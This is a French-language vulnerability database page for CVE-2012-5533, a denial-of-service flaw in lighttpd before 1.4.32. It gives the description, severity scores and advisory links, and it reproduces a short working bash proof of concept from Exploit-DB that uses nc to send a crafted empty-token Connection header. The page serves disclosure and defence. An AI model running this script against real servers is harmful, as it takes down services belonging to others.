CVE-2012-5533 : Détail

CVE-2012-5533

20.27%V3
Network
2012-11-24
19h00 +00:00
2017-08-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The http_request_split_value function in request.c in lighttpd before 1.4.32 allows remote attackers to cause a denial of service (infinite loop) via a request with a header containing an empty token, as demonstrated using the "Connection: TE,,Keep-Alive" header.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 22902

Date de publication : 2012-11-21 23h00 +00:00
Auteur : t4c
EDB Vérifié : No

#!/bin/bash # Exploit Title: simple lighttpd 1.4.31 DOS POC # Date: 11/21/2012 # Exploit Author: t4c@ghcif.de # Vendor Homepage: http://www.lighttpd.net # Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz # Version: 1.4.31 # Tested on: Debian Linux, Gentoo Linux, Arch Linux # CVE: CVE-2012-5533 if [ $# -lt 2 ] then echo "usage :$0 <Host/IP> <Port>" else echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2 fi

Products Mentioned

Configuraton 0

Lighttpd>>Lighttpd >> Version 1.4.31

Lighttpd>>Lighttpd >> Version 1.4.32

Références

http://www.openwall.com/lists/oss-security/2012/11/21/1
Tags : mailing-list, x_refsource_MLIST
http://www.exploit-db.com/exploits/22902
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securitytracker.com/id?1027802
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/51268
Tags : third-party-advisory, x_refsource_SECUNIA
http://osvdb.org/87623
Tags : vdb-entry, x_refsource_OSVDB
http://marc.info/?l=bugtraq&m=141576815022399&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.mandriva.com/security/advisories?name=MDVSA-2013:100
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/51298
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/56619
Tags : vdb-entry, x_refsource_BID